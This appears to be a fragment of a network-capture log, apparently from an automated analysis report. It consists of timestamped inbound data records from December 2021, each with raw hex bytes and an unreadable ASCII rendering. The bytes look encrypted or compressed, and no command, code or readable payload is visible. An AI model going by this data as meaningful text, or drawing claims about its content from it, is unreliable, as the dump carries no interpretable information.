                                                                                              2021-12-13 23:57:11 UTC763INData Raw: a7 99 1a d7 8d 6b 14 ee c3 7f 3a 6a 27 2e ae c0 a2 58 5e 88 bb db f4 ca af 19 96 91 43 cb 5e f8 0b 5a bc ce dd a7 e1 d7 c9 d5 a6 82 d0 f7 0c f4 69 45 19 e9 13 1c fa eb be df 34 a7 a2 06 6e 79 3d 39 ae 89 44 c4 c9 49 c4 02 93 d0 84 8d e4 2e 6b 81 f4 f7 84 bb bf d7 1f a2 77 59 0b 82 79 33 b9 91 ba d9 91 60 1a 39 bd 69 51 87 bc e9 4d 24 35 6f 33 bd 9f fa b2 9b 8b ca eb e4 7e 6a 81 dd 4f 2d b8 ef a7 6e 3a e1 a2 f7 53 37 d1 db b2 f3 c6 d5 7e fb 62 cd e5 b0 d8 1b 76 74 f5 b4 30 78 bd 8b 48 04 f3 71 d9 66 61 a9 bf 09 8f ac 27 7d c5 02 17 6e db 91 b0 99 18 d7 b8 46 72 52 f2 e8 1b e2 49 c9 a4 a6 06 c6 fe 6b 6f 90 0c 0d 84 fd 1d 8d 6e f6 47 51 f6 1b 84 c8 4d c0 be cd 34 72 5c d3 92 c7 e9 05 e7 75 eb a6 d4 39 c6 d1 0b 82 77 c6 36 93 4b 54 e1 7e 5b 9b c5 31 a5 f1 4f
                                                                                              Data Ascii: k:j'.X^C^ZiE4ny=9DI.kwYy3`9iQM$5o3~jO-n:S7~bvt0xHqfa'}nFrRIkonGQM4r\u9w6KT~[1O
                                                                                              2021-12-13 23:57:11 UTC764INData Raw: 6a db 4e 86 4d ce 55 9e 0c 1b f2 bb 3a 48 22 8d 30 a5 e6 72 4f 69 95 15 eb 0e c5 64 27 c3 66 eb 28 e7 ef bc c5 3d 19 36 5f 4f 59 a2 08 ce c9 b0 05 b9 9c 93 61 43 7e f7 72 04 1d 61 5e 7e 32 ac 33 57 eb 64 58 6f 15 75 87 8a bc 9d 0c 5b 91 ab 75 32 ac 91 8a c9 59 ae f5 b9 5a 67 b9 7a ab 89 0a 9c 73 32 ec 86 bc 56 d5 c6 1d 0b 21 28 ea 35 c5 a9 af aa 81 30 14 d5 bc a6 c8 a3 54 6f e3 2d f5 c9 b0 29 0e 49 10 5a 9f 01 47 a1 6c 87 c6 c9 b0 de 0a 6a 9c 0c fb ff ac 5d 0b 78 54 45 96 be 49 df 24 0d 34 74 20 e1 25 2c a0 34 0f e5 61 b0 91 71 6c 46 83 21 0f a0 83 40 48 78 09 38 eb 63 90 05 c5 49 b7 bc 92 10 6d 5a d3 56 1a 9b a0 10 46 3e 47 3e bf d9 c5 d1 d9 8d c0 3a e8 32 bb 81 68 20 c2 60 4c 00 23 b0 7e ac a3 e3 0d 09 4e 03 4d d2 40 e0 ee 39 55 d5 b7 ef ed be 1d 02 c2
                                                                                              Data Ascii: jNMU:H"0rOid'f(=6_OYaC~ra^~23WdXou[u2YZgzs2V!(50To-)IZGlj]xTEI$4t %,4aqlF!@Hx8cImZVF>G>:2h `L#~NM@9U
                                                                                              2021-12-13 23:57:11 UTC780INData Raw: 07 c3 af df 4c 85 f7 f1 cb 89 96 ec ba 30 fe 5e 6c fa 2d 6a 1e 17 e1 fd 37 8c fb cc fb c0 d7 b9 08 d7 e6 c8 81 4f d7 d0 dd d0 c4 4c 0f 3d b6 07 1a 02 48 4b a6 8a bd cb 42 bb c2 cf 43 9a f8 fb c6 02 cd 95 3d f4 eb 33 31 98 b3 9a 66 95 79 20 12 ea ce 5d d7 93 27 2a 60 9c df 73 b7 c4 42 eb 57 e2 62 e3 d9 07 f3 7b 76 54 78 4e cc e7 31 a1 f3 9d 08 96 1f c3 3a 32 e5 27 35 a8 fb 7b e0 1c 61 b0 be 89 54 d9 90 d6 63 1e d5 68 5d b1 55 52 2b ae 6e a8 18 27 a9 fe ea 8a b5 5f a8 52 c5 5a 55 95 fc 72 c5 3b 0e c9 be e5 08 8a b7 7a fa f1 77 30 09 8d 2c 3a 8f 85 1a 02 ab 64 d5 5e bb 49 e2 bb 76 3d 7d b9 4b 33 ee da a2 f0 37 bd f7 34 ec 04 85 27 b3 0f d0 c7 73 f1 c1 c9 36 d5 bf 0b 0e b3 05 dc f4 20 2c e0 cf 4b 61 01 d3 01 30 6f 8b b0 b7 7a 9a 61 74 f5 e4 25 de 95 7f 72 c8
                                                                                              Data Ascii: L0^l-j7OL=HKBC=31fy ]'*`sBWb{vTxN1:2'5{aTch]UR+n'_RZUr;zw0,:d^Iv=}K374's6 ,Ka0ozat%r
                                                                                              2021-12-13 23:57:11 UTC781INData Raw: 0f 83 f6 c6 0c 69 ae 00 fc 29 b9 c3 6c b2 44 b8 37 24 c2 dd 23 09 b8 49 a4 d0 c6 00 be 2b e9 00 e7 75 0c 50 d3 4b 99 96 17 15 7c 51 f3 b4 49 a1 a8 59 a9 48 3e 07 6a 15 ac ac 1d dd f5 e5 b7 6a a4 27 3b 06 ac 90 99 71 fa 5d 16 ab 4b a8 6f 21 31 56 55 2d fa d2 86 bf ac 90 68 14 6b 51 16 46 d1 77 13 84 c5 54 3e 13 16 d3 a8 be a6 2d e4 e1 a7 f9 21 f9 cf 06 f1 3a 22 47 07 71 6e bb 3e 15 8b 8e 31 bb a7 4d 3d 10 b7 0d 4f 2a 79 8a e9 ba 4f b0 be 73 70 95 a3 56 c5 a4 a5 1b 59 d2 52 ae 03 9e 8c 3f c9 9f a4 f2 27 03 8c 27 71 78 e2 21 b9 a9 1e 7a c3 49 f6 25 82 f0 ff b1 f7 b4 d1 51 15 c9 f6 cc dc c9 dc 84 e0 4c 64 54 9e a0 0b cf 08 48 90 0d 10 51 21 6a c2 64 66 f8 48 62 24 01 96 55 71 87 64 46 a2 21 c9 4e 66 34 68 80 b8 21 48 ce 35 2c eb e1 79 50 c2 47 50 c0 75 55 3e
                                                                                              Data Ascii: i)lD7$#I+uPK|QIYH>jj';q]Ko!1VU-hkQFwT>-!:"Gqn>1M=O*yOspVYR?''qx!zI%QLdTHQ!jdfHb$UqdF!Nf4h!H5,yPGPuU>
                                                                                              2021-12-13 23:57:11 UTC797INData Raw: c3 10 5e a4 d2 ad fa 1e 62 29 f4 e3 7d bc 07 55 41 96 39 13 01 90 9a 6f 06 90 b4 2e fc fc 4f 40 7e 30 e4 50 17 98 9b a6 ed c3 b4 cb 08 7c 02 de 8d 29 df 3c 13 b1 48 c3 68 94 ce 8d 7f da 20 03 ef 7e b9 a0 ca e0 a7 05 55 56 3f 1a 98 08 18 6b c9 87 51 53 99 b3 f6 1e 45 ef c6 9c 52 16 45 eb 12 77 5b 35 39 8d ab 4b c8 e1 b3 de df a8 5b f2 4f a6 16 5d f4 bb de a2 c5 71 7c 48 2c 63 35 4f d1 d1 9e 57 32 b7 67 1e 10 0b d0 72 2d 96 96 a5 6f 29 d6 91 49 6e 7d 80 c1 1d 88 c0 a4 b2 44 b7 73 ba 9d be 31 e2 5a 4a 2e dd 89 d2 3b 8e 8f 0f 3a a9 aa 35 bd e5 9d 95 4c 79 60 17 34 09 f5 7b 4e 4c 42 bf a7 04 f7 08 75 81 b4 d9 c8 d3 4e 61 5d 80 a1 a9 c5 dd 4d 4f 0f 2c 30 4e 3e e7 85 2e 86 69 48 b4 57 e7 37 eb 05 1b f2 2b 73 5c 6a 20 07 7e 96 3f d7 d8 a8 4a f3 a1 23 b4 4e 67 f7
                                                                                              Data Ascii: ^b)}UA9o.O@~0P|)<Hh ~UV?kQSEREw[59K[O]q|H,c5OW2gr-o)In}Ds1ZJ.;:5Ly`4{NLBuNa]MO,0N>.iHW7+s\j ~?J#Ng
                                                                                              2021-12-13 23:57:11 UTC798INData Raw: 37 e3 eb 1d f8 fa 85 cc 79 ef 93 0d b0 74 e0 99 80 ea 84 ff 24 cb 77 03 63 57 f3 7e 98 38 67 9f a0 37 2c 0d 48 3f 34 19 2f 38 43 e0 af c2 79 e9 78 65 bd 0a bb be ad 48 98 94 af f1 10 60 eb 96 ad 50 66 2a ff fc 14 89 2c 3a 17 59 4b 30 71 f2 01 a4 5a 09 7e a0 14 6a 51 73 85 b4 fe c6 35 a5 84 71 0b ea 35 dd ab 4c fd a3 5a e2 35 94 c8 a5 be 56 2d ea 6b f5 85 e8 86 05 78 5f a1 1a cb 54 77 d3 7b a0 dd 4f 3a 58 a4 3d 15 8f a2 4f 52 62 a8 2a b2 6f c0 43 24 c6 fb ce c3 6b 10 1b 50 ff 6a 00 36 ab bd 4a 2a 75 55 f3 95 9f 93 52 17 69 37 54 61 c4 82 cf 0d 73 9c a7 9b 8d 72 1d 9c 2f e6 b8 7d 2e 69 20 47 7e a1 38 06 ab 17 66 32 c2 84 79 9d 60 d6 6a 30 bd 3c d9 08 73 64 77 84 c9 f9 f2 f9 38 30 6a f9 62 09 7b be cb a8 b5 e5 e9 52 f3 ce 8a 7a 35 78 40 e5 7e 06 03 aa db aa
                                                                                              Data Ascii: 7yt$wcW~8g7,H?4/8CyxeH`Pf*,:YK0qZ~jQs5q5LZ5V-kx_Tw{O:X=ORb*oC$kPj6J*uURi7Tasr/}.i G~8f2y`j0<sdw80jb{Rz5x@~
                                                                                              2021-12-13 23:57:11 UTC814INData Raw: 21 50 68 31 2a d1 3c dd 34 0d 53 d1 28 87 43 66 cc 9e de 49 d8 f2 ad 97 f8 b6 e7 77 78 38 74 ef 4d a9 f2 c7 9c 71 18 39 42 13 33 90 1e 5d f5 48 26 5c a5 c1 1d fc 47 4d 9b 31 65 96 99 9e 3a c5 36 f4 f7 f6 5a 6c ec f3 43 06 36 14 1b 37 0c e8 6a fe a4 67 6c d5 51 0b 67 e3 09 55 cf f2 9e 1c 85 97 43 66 4e 9d d5 5f 6e 29 b4 5b f8 3e 6e a0 1c b9 10 2f e9 79 65 31 f0 10 73 69 65 d4 0d 12 48 9f 1e 30 df 34 07 cd b4 80 da ac 0f d3 88 76 cb 2f 4b c4 3d 95 41 1b e7 6a a2 0e 98 6f 4c a0 36 d0 ec e4 5e 4b 6c 66 12 f4 24 1e a1 58 29 6b cd 61 57 ed 12 5d c8 fe fb 55 b5 5e 5c 80 2b 71 50 43 72 52 62 3e 70 c9 0f eb b8 9d 80 36 4f 73 0c f7 74 b4 ca 3e 14 f7 51 e0 e1 42 6d cc 36 3b 3a 35 1b 72 dd 4e fd a7 ed fa d5 2e 51 6c 40 a4 eb 76 2c 87 88 e5 76 49 59 6b e3 e7 25 f8 0a
                                                                                              Data Ascii: !Ph1*<4S(CfIwx8tMq9B3]H&\GM1e:6ZlC67jglQgUCfN_n)[>n/ye1sieH04v/K=AjoL6^Klf$X)kaW]U^\+qPCrRb>p6Ost>QBm6;:5rN.Ql@v,vIYk%
                                                                                              2021-12-13 23:57:11 UTC815INData Raw: 28 1f 26 90 35 fd ab a4 d5 a5 bc 28 fc 26 d5 67 ec d2 0e a4 92 08 86 2a 69 47 ce 3f 41 2c 2e c7 54 65 3c 15 7e 93 63 90 0a c6 97 c4 93 9e 1a a0 12 a9 4d a0 0d 90 ab d6 01 6f da aa c7 d5 f2 f3 bf fb 82 6a 4d f6 b9 33 76 49 f6 45 9b 08 d7 d6 38 dc ad ec ba 02 f4 a6 7f f8 d1 25 da c2 38 9d 6c 54 7b fe 42 9d 65 5a be ff 43 9a 5f b4 bb 6d 64 c9 ab 7c 18 1d cd 57 0f 1c 83 86 b4 85 57 a8 2c 5f ef 9c 56 0d 8e d3 f9 4a b4 12 df 2b 76 89 5f 92 d3 4c d8 95 c1 14 65 2b 73 5b c1 c6 03 2d 2a 7f 89 8a b7 44 1d be fa 44 4a fa da 3d b2 dd 34 b5 c9 d5 f9 b0 ad 4a 46 87 35 cd 89 a7 c9 63 1d 79 a8 3b 3a c8 9d 39 d5 92 41 de cc e3 29 2a 69 8a 0a dc 27 8b ad 20 81 d3 ab 25 5b 1f 56 54 23 73 0f 96 48 2c 21 2d 35 82 50 2b a6 49 3c 73 00 ff 41 33 10 e2 8d 1e 07 21 ee 67 53 d5 72
                                                                                              Data Ascii: (&5(&g*iG?A,.Te<~cMojM3vIE8%8lT{BeZC_md|WW,_VJ+v_Le+s[-*DDJ=4JF5cy;:9A)*i' %[VT#sH,!-5P+I<sA3!gSr
                                                                                              2021-12-13 23:57:11 UTC831INData Raw: e4 b4 71 c2 66 31 6d bc 76 1f 9a f7 9f 0e 43 23 d2 ae 8a 26 b5 f1 21 7c b8 35 3e ac aa a2 65 b5 31 b3 c6 96 14 d6 44 1b cf 48 96 d7 c6 97 12 c4 b5 f1 dc 64 61 6d ac 79 45 8b 6b e3 e2 64 42 91 6e 75 03 eb c7 5f 7a 33 45 da 65 a8 90 36 6e 3a 94 d3 c6 33 7e 24 c4 e8 f3 64 24 46 7f 1f 82 c4 e8 ed 21 68 18 4f 56 d2 52 da 38 74 3f 61 49 c8 3b c0 92 b1 e6 96 24 0d 61 b5 f1 a6 21 26 da 78 c5 10 4e 1b df d9 49 98 13 b9 1f 99 33 0c 9b 33 00 9b f3 5e 25 2d a3 8d bf 5e 21 ad a3 fa ac 20 75 54 5d 8a af 8d d7 ac 63 b5 f1 d7 ab e5 b5 71 5e b0 89 36 2e 0f b6 54 1b 27 06 5b a4 8d 97 6a a5 b5 f1 1f f1 a6 da 78 d7 f7 46 6d bc 3e 51 40 1b 77 d1 5a a1 8d 6d b4 72 da 58 11 65 89 36 76 9e 2f a5 8d bf 0e 95 d6 c6 7d 42 a5 af a9 6b 28 79 4d fb 86 49 69 e3 ff 84 19 b5 71 5e 92 ac
                                                                                              Data Ascii: qf1mvC#&!|5>e1DHdamyEkdBnu_z3Ee6n:3~$d$F!hOVR8t?aI;$a!&xNI33^%-^! uT]cq^6.T'[jxFm>Q@wZmrXe6v/}Bk(yMIiq^
                                                                                              2021-12-13 23:57:11 UTC832INData Raw: 7c 4d be 78 13 cc f7 7b 1e 6f 8f 5e 74 43 80 f9 1a dd b5 88 f9 98 79 ee 0c ab 9f f5 6e ee 71 89 d1 59 60 12 c4 9e 62 eb 5d f4 76 a0 1a e0 bf 13 f5 1c 47 c1 a2 5b 2f e0 02 ae 55 53 7e 0e e1 77 82 5c 3c ef 05 ab c2 cb 96 34 8c 52 b5 ec ef 99 b6 c4 3e bc 2c a8 36 f8 39 fc d4 62 3b bd f7 d7 b0 58 92 12 cc cb c6 cb aa 94 c1 0d 86 db 96 f8 8c 84 d5 0d c1 ae 56 a1 df 32 55 a1 40 8b 09 53 3f 0c ef e7 cc 77 c0 6f 58 ac a6 b4 0e a0 35 17 cf 62 f0 0d 06 f8 0d 1f f5 f7 3c 03 be c1 00 bf e1 23 e6 1b 1e 4f 02 93 d7 a0 b5 a7 34 4e 3a f7 0b 9a 72 c5 e3 a1 f0 ff 54 be 6d d5 60 dd e2 22 4f bf a2 25 9e 94 b6 a8 53 49 d6 53 db 12 f8 bd 4e 07 98 4a 21 f5 98 4a 21 3a 4d 21 ac 13 b4 d8 2e 6a 9c f2 71 5d 1f 9d b6 08 fe aa 55 81 26 94 e0 a3 c1 e7 61 b3 4d 1c 8f 68 ca 71 41 ad 7a
                                                                                              Data Ascii: |Mx{o^tCynqY`b]vG[/US~w\<4R>,69b;XV2U@S?woX5b<#O4N:rTm`"O%SISNJ!J!:M!.jq]U&aMhqAz
                                                                                              2021-12-13 23:57:11 UTC848INData Raw: ba d2 84 ba f1 a7 c7 47 8d 70 66 7f b8 40 78 94 b3 17 04 ce ec 17 93 3b 7e 12 e2 ed 70 1a 63 e7 6f fb 4a fa f6 d0 3e aa 24 de a2 d2 99 c4 9b ac 58 24 1d 57 cb f7 d5 17 ac d4 c2 77 0c 91 77 af 7e 25 90 77 78 26 37 a4 e9 91 77 45 17 45 5b a9 80 78 07 8c c6 ad 20 9f a6 e9 e3 5e c2 dd 0d bd 63 dc 56 3a 6d 1c ea 4c 04 38 85 27 77 83 1c b2 49 b9 3b d7 b0 31 ee ce 35 cc e0 ee 4e 0f b3 fd a0 ee b8 44 6c ec 41 2a bb a9 fc fa 12 e1 ee d2 bf 26 dc dd 1d 5f 13 ee ee 99 af 89 2d be 43 e5 94 6f 88 5c 49 e5 03 54 fe 9d ca b4 cb 44 fe 8c ca 2e 2a af 53 99 7d 85 72 73 54 ee a1 d2 43 65 fc 55 22 eb a9 ec a2 f2 12 95 8b be 25 b2 85 ca 1e 2a 2f 53 99 33 42 64 0d 95 77 53 f9 1b 2a 3f a2 b2 f0 1a 6d 27 95 8f 50 f9 32 95 03 54 ce fd 8e de a7 f2 b5 ef 08 77 f7 05 bd 9e 36 4a 38
                                                                                              Data Ascii: Gpf@x;~pcoJ>$X$Www~%wx&7wEE[x ^cV:mL8'wI;15NDlA*&_-Co\ITD.*S}rsTCeU"%*/S3BdwS*?m'P2Tw6J8
                                                                                              2021-12-13 23:57:11 UTC849INData Raw: 19 9a c2 fb f9 9f c2 28 de cf ff 34 46 11 5b 79 96 ca f7 a9 4c 88 26 f2 66 2a 1f a7 72 90 ca 05 53 89 7c 90 ca 63 54 5e a2 32 df 42 e4 7a 2a 7f 47 e5 69 2a 0b 62 88 6c a6 f2 f7 54 7e 46 e5 9c 1b 88 bc 97 ca a7 a9 fc 0b 95 fd 54 4e 8d 25 72 39 95 f7 51 79 98 ca ef a8 cc 8a 23 72 35 95 2d 54 fe 2f 95 59 56 22 6f b1 f2 7e fe e7 57 f4 fa f7 56 de cf fb f4 53 19 85 e6 18 b7 db 7c d4 3d 83 41 e7 14 c6 cb 26 c4 12 e4 9d c1 98 6d b2 5c b1 6d e3 2c 3a a7 2a 23 68 c1 a1 3e 26 9d b3 3b 83 45 e7 28 5a e6 f2 5b 6c 38 74 0e 72 84 47 e7 6c 77 28 e9 1c 79 ef 46 5e 52 d2 39 bb 1d 4c 6a 45 56 2c 65 e4 25 15 9d d3 61 a0 5c 6c c5 75 26 9d d3 69 a4 ec 50 1f 93 ce 79 dd c1 a0 73 64 25 95 a4 c4 c8 4b 4a 3a a7 c7 a1 45 e7 e8 55 94 32 f2 52 30 3a a7 df a1 45 e7 98 a9 18 13 30 63
                                                                                              Data Ascii: (4F[yL&f*rS|cT^2Bz*Gi*blT~FTN%r9Qy#r5-T/YV"o~WVS|=A&m\m,:*#h>&;E(Z[l8trGlw(yF^R9LjEV,e%a\lu&iPysd%KJ:EU2R0:E0c
                                                                                              2021-12-13 23:57:11 UTC865INData Raw: 15 25 b7 b7 75 25 59 d5 f1 34 15 1e 09 be 67 f2 ef b3 f0 bd e9 38 fb 06 be 42 56 7a f7 63 27 2b c9 41 39 68 f8 19 ba eb 71 08 92 f4 c7 3c 06 e1 06 08 41 46 e8 87 11 d8 7a 21 bf 11 ef c8 aa f8 5d 59 35 87 41 1c 06 73 a8 e1 50 cb 61 08 87 a1 1c 86 71 a8 e3 30 9c c3 51 1c 46 70 68 1b 64 f0 6b 0e cf 73 f8 0d 87 fd 1c fe 97 c3 0b 1c 5e e4 d0 ce e1 25 0e 2f 73 38 c0 a1 83 c3 6f 39 1c e4 50 e6 b0 9b c3 4f 39 fc 8c c3 33 1c 9e e5 f0 73 0e bf e0 f0 3f 1c 4a 1c f6 70 78 8e 43 2b 87 bd 1c 7e c9 e1 57 1c f6 71 d8 ce e1 11 0e 3b 38 3c ca e1 31 0e 8f 73 78 82 c3 8f 38 ec e4 f0 24 87 a7 38 ec e2 f0 34 87 1f 73 f8 09 87 ff e6 b0 9e c3 fd 1c 36 70 d8 c8 61 13 87 1f 70 d8 cc 61 0b 87 ad 00 33 ba bd cf dd b6 7e ca fc ce f0 e5 dd d7 66 d3 83 63 61 55 37 b3 cb 90 38 9c ff 29
                                                                                              Data Ascii: %u%Y4g8BVzc'+A9hq<AFz!]Y5AsPaq0QFphdks^%/s8o9PO93s?JpxC+~Wq;8<1sx8$84s6papa3~fcaU78)
                                                                                              2021-12-13 23:57:11 UTC866INData Raw: c2 66 a4 17 3e 06 58 cc e2 f0 3e af bc 33 24 c8 3b 8a ca b1 a9 d2 c0 0c db 9d b8 91 18 88 0c af a8 9c 9f 9d 6a 28 37 94 16 1a 4a 8d c1 15 95 39 15 26 83 a6 a2 32 ad a0 a4 d2 e0 55 14 69 95 bc fb 8f 9c 63 7e 75 0f 83 37 f7 b0 b9 c7 86 a3 e9 57 35 f7 40 bd f7 3c b8 ee 05 59 a4 1f dc ea ec 2c b2 a1 32 83 d8 2b bd f5 9e 2e 27 8b a4 3e 9b e8 e5 b0 b7 67 f6 e0 9a 5d 45 2a 29 54 93 77 28 0c 25 11 24 1c 07 91 82 4a ae b3 52 68 e9 6a d4 68 ee 87 f3 1c 3d 1e 8a 90 d3 35 38 d9 b4 74 a9 a1 82 9b cd 80 62 74 99 cc a4 52 e4 3c a7 22 7e 65 28 af 5c 06 36 c4 6b 9e e1 5b 04 9b 56 04 3b 67 15 04 67 15 50 a4 e7 a4 e2 1c b5 fb f4 6c 1e 76 0f 4e 50 02 ca de da 73 de 7d 17 69 15 48 3d 84 7d c5 c3 fb cf 31 d9 2b 97 84 ef ad ef 66 82 4b 00 b7 05 dc 8c dc 2c 8e 09 50 9d 35 17 9f
                                                                                              Data Ascii: f>X>3$;j(7J9&2Uic~u7W5@<Y,2+.'>g]E*)Tw(%$JRhjh=58tbtR<"~e(\6k[V;ggPlvNPs}iH=}1+fK,P5
                                                                                              2021-12-13 23:57:11 UTC882INData Raw: bf d7 55 50 8e ad 12 fd 22 bb 1e 94 c7 51 56 0d 14 d0 b9 89 8c 2d d9 a4 f2 7f ec cc ff e9 c6 fc 9f 6e cc ff f9 97 d7 b1 25 1e 26 83 ff 13 26 15 2f 6b 33 f9 7b 25 63 c2 f1 7a 4c a6 7f 03 e5 78 18 ca e1 e2 78 91 c9 83 1b 54 4c 3e 5c c9 98 70 bc 1e 93 4e 28 eb 32 94 d0 b9 95 30 d9 aa 64 52 f9 32 65 b2 b8 2b 65 32 af 2b 65 52 1e e2 95 49 2b 89 c9 10 60 31 88 4b 67 f6 2d c6 ad a7 7a e7 51 cb eb f8 3f 0e c6 23 60 85 ae ff 73 01 fd 1f 28 83 2b 60 85 e4 ff ac 57 fb 3f 0e c6 23 60 85 ae ff 83 b2 be 80 d2 39 b7 13 1e db 95 3c 6e f3 94 c7 ec 47 28 8f a9 8f 50 1e 9f dc 27 f1 90 f3 08 92 78 24 71 b3 88 ad 32 9b 9b d1 88 4b 0c fb de 7b 7f a8 43 c7 fe 5f c1 f8 f4 72 e8 da ff e7 d1 fe bf 0f fb 43 1d 92 fd bf 4e 6d ff af 60 7c 7a 39 74 ed ff af d1 fe 07 59 ce 1d 52 c3 b2
                                                                                              Data Ascii: UP"QV-n%&&/k3{%czLxxTL>\pN(20dR2e+e2+eRI+`1Kg-zQ?#`s(+`W?#`9<nG(P'x$q2K{C_rCNm`|z9tYR
                                                                                              2021-12-13 23:57:11 UTC883INData Raw: b7 53 4a 36 ee f5 6c fc e7 bd 6c fc e7 bd 6c fc 67 5b af f1 37 9c 48 34 81 9b c0 f8 44 73 51 c4 37 44 3a 9a 5c 3a be ae cd e5 9b c5 8c 4b 9f d7 f5 b8 44 7f 8e e3 9f a1 2c ae 3e af 8b 5c 7c 5f 56 71 71 2c 66 5c fa bc ae c7 e5 d6 71 b4 7f a1 74 ce 73 9a ed f9 39 25 a3 07 5e a7 8c 06 77 a4 8c 9e ee 48 19 ad 69 e3 b5 3d 6f 2e ab 3f f2 59 19 de c6 7f 6e d4 66 f3 e9 22 c6 26 6a a3 1e 9b 47 b0 3c d7 da e0 f8 cf 8d d2 f8 cf e5 ea f1 9f 8b 18 9b a8 8d ba e3 3f cb 30 fe 0b b2 9c 15 52 db 53 a1 64 d1 63 23 1b ff 79 0f 1b ff 79 0f 1b ff 19 a0 d9 e7 21 b6 3d e2 6c 04 33 59 95 78 96 16 93 91 9b 74 de ff d9 8c c9 9c 4d ba ef 7f 2c c7 57 a0 91 6b ce 26 e9 fd bf 4c fd fe cf 66 4c e6 6c d2 7d ff 97 e2 fb 1f 64 39 85 3b be cb 04 25 ab 71 9b 28 2b 53 07 ca aa 59 07 ca 6a 9c
                                                                                              Data Ascii: SJ6lllg[7H4DsQ7D:\:KD,>\|_Vqq,f\qts9%^wHi=o.?Ynf"&jG<?0RSdc#yy!=l3YxtM,Wk&LfLl}d9;%q(+SYj
                                                                                              2021-12-13 23:57:11 UTC899INData Raw: dc d5 6e 8f b8 4e 62 e6 4c 20 93 e7 5c 0d 12 5d c5 47 21 1e 4b 8a 9c 1e 64 59 c7 da 1f 8e c6 f2 c2 63 11 91 a5 45 cf 92 36 c0 93 74 2c 0d 3a 19 72 dc a2 db e8 85 92 1d 5f 57 b7 59 a4 6e 9f 7c 38 1a cb 7f 44 b7 8d a3 bb 6d 1c db ed 52 56 ba 05 9c 6a 41 a5 b3 dc e7 01 1f 51 90 5d 9e e9 72 55 16 78 1d fe ca b2 f2 15 31 14 48 48 62 a6 70 61 48 a1 28 0c 6f 2d 4c c9 18 6e 4a 19 88 0a de c6 80 7c 56 b2 a6 47 f5 7c 38 f9 02 af e0 c7 3b 3d 86 0f 59 af 41 58 2f 31 35 8e 66 3a c6 7e ad ac 0b b5 5a ec 40 73 72 57 56 67 ad 41 6d c4 b0 b6 88 6e 8c 33 48 ca c4 96 65 25 6e 55 71 0b e9 9e a1 27 62 23 5f b8 e9 ad ec 08 44 90 b4 81 25 d2 b4 ca ab 5a 7d 0f f7 61 77 b1 5e 68 35 15 64 0d 51 28 f0 e6 94 f9 fc aa 23 8e 99 00 1d 33 b2 44 cd 62 9f dd 3e 9f db 87 b4 ff 93 0d 02 a6
                                                                                              Data Ascii: nNbL \]G!KdYcE6t,:r_WYn|8DmRVjAQ]rUx1HHbpaH(o-LnJ|VG|8;=YAX/15f:~Z@srWVgAmn3He%nUq'b#_D%Z}aw^h5dQ(#3Db>
                                                                                              2021-12-13 23:57:11 UTC900INData Raw: 5c 2f 89 08 f6 71 79 dd d5 fd ca 4a 03 ee 6b c3 f5 2e 43 f3 00 a0 c8 87 ff fd bc 22 59 65 79 60 e7 79 65 63 0c 56 77 e9 ab 5f a4 ea 2e f9 3d ac 5e 60 c0 fa 4e 7d 7d 80 ea 3b e5 5d 54 6f c4 fa 93 fa fa 32 aa 3f 29 ff 82 ea 63 7a ae 83 01 93 0e c9 77 3c 7e 5e 09 e6 b6 e1 c5 41 29 4d 29 9a 1b ac 6a 93 86 9f 85 bf 9e 78 50 e7 a3 55 3a 25 7e b8 95 c2 25 cd a8 2a f9 b3 6f f2 40 75 e0 9b 5c 99 7f 98 02 ca 3c a5 53 e6 68 5d 82 ee f2 1d 45 81 dc 11 8c 33 8d d8 50 39 f8 95 24 99 ea 77 9f aa 66 d2 db d2 b1 5f 82 04 5b 3a d0 20 06 6a cf 2b 55 f1 52 ab fc cc 7a b8 3a a8 e6 23 84 72 69 b6 98 74 b9 34 4b fc 8c 05 be bb 13 a9 f0 8c 9a a3 a6 31 19 35 80 5b 9c 2f 9d 0d a4 cc 90 06 a4 2b 29 54 d8 63 92 be e1 58 c9 a4 64 a9 60 86 19 ba 9f aa 3c bc 03 99 1f 05 92 5b e0 31 fa
                                                                                              Data Ascii: \/qyJk.C"Yey`yecVw_.=^`N}};]To2?)czw<~^A)M)jxPU:%~%*o@u\<Sh]E3P9$wf_[: j+URz:#rit4K15[/+)TcXd`<[1
                                                                                              2021-12-13 23:57:11 UTC916INData Raw: 14 99 eb 58 65 68 89 56 16 21 fa 80 08 6d c8 b3 83 e2 d9 2b 1c 25 dd 2c 1e b5 66 5b 46 61 89 e8 b6 e2 fe ad cf 82 2e 42 6a 10 de 6d 76 49 f1 ff b3 f6 34 60 51 56 e9 9e 81 09 47 45 07 0c bd 94 74 b3 62 6b 9f b4 3f 2d 35 ac 56 84 41 fc 19 18 18 06 10 44 9d 10 04 24 31 99 51 fb 41 51 a4 75 f6 73 5c 2d db 6c d7 db cf 53 4f 69 eb 6e 74 af 95 96 6d b8 18 50 71 d3 94 8c 36 bd a9 17 d7 a3 a0 50 11 a1 a0 73 df f7 3d e7 fb e6 1b 40 b2 f6 d6 23 e7 9b ef 3b ef cf 79 cf 7b 7e de 73 de 73 de ab 6c 97 31 2c 33 d5 ce 42 11 48 8c 44 b9 00 78 30 fc 2a 1a 66 0e 9b 6c 87 41 12 21 c5 98 8f 3a eb bf fe 60 00 58 9a 5e 04 b1 10 f5 bc 89 7a 50 12 7e ab e3 fb 44 d6 9c 02 7a 4f c8 4b 4a 8a af b2 af 98 c8 78 aa 84 8a a7 8e 75 e9 ed 57 01 15 c3 5e 52 45 80 50 38 35 ba 4a c8 49 2c 0c
                                                                                              Data Ascii: XehV!m+%,f[Fa.BjmvI4`QVGEtbk?-5VAD$1QAQus\-lSOintmPq6Ps=@#;y{~ssl1,3BHDx0*flA!:`X^zP~DzOKJxuW^REP85JI,
                                                                                              2021-12-13 23:57:11 UTC917INData Raw: ee 40 d8 3a b1 17 cf bf 95 84 81 e6 ad f0 49 2e 8f 76 db b5 e5 d1 95 59 62 2f dd 63 8b aa 3c 84 21 f3 70 3f 48 69 52 e2 8c 20 e9 9b cb 9f 08 65 ee 10 1b 4f ba f7 bc 0f 5e d9 f8 a9 09 e7 7d 13 aa 3d 71 46 6f 5c 18 2f 58 76 ce 27 f6 ae 28 b2 57 9c 69 4a bb eb fa f2 27 22 98 6b 88 8d bf 0f 39 6b e3 22 98 a7 14 f7 d1 76 00 b3 62 ff 49 0b 04 56 c3 b7 60 09 4a 11 15 54 6f b7 9b 82 3e 21 7d 25 d1 58 f9 b1 cb b8 ee 90 db a8 4c 35 d5 28 fb 00 ce 63 33 d6 f8 75 46 5d bd a5 45 d8 87 2c 9a b6 e0 ea b4 97 0e ef f1 ef dd b4 71 cd 6f b9 24 02 4f ba 47 a8 21 9a c8 2d 83 4f c2 fd ee 55 91 6b 4e a3 b7 0f 39 15 52 7c ae 35 07 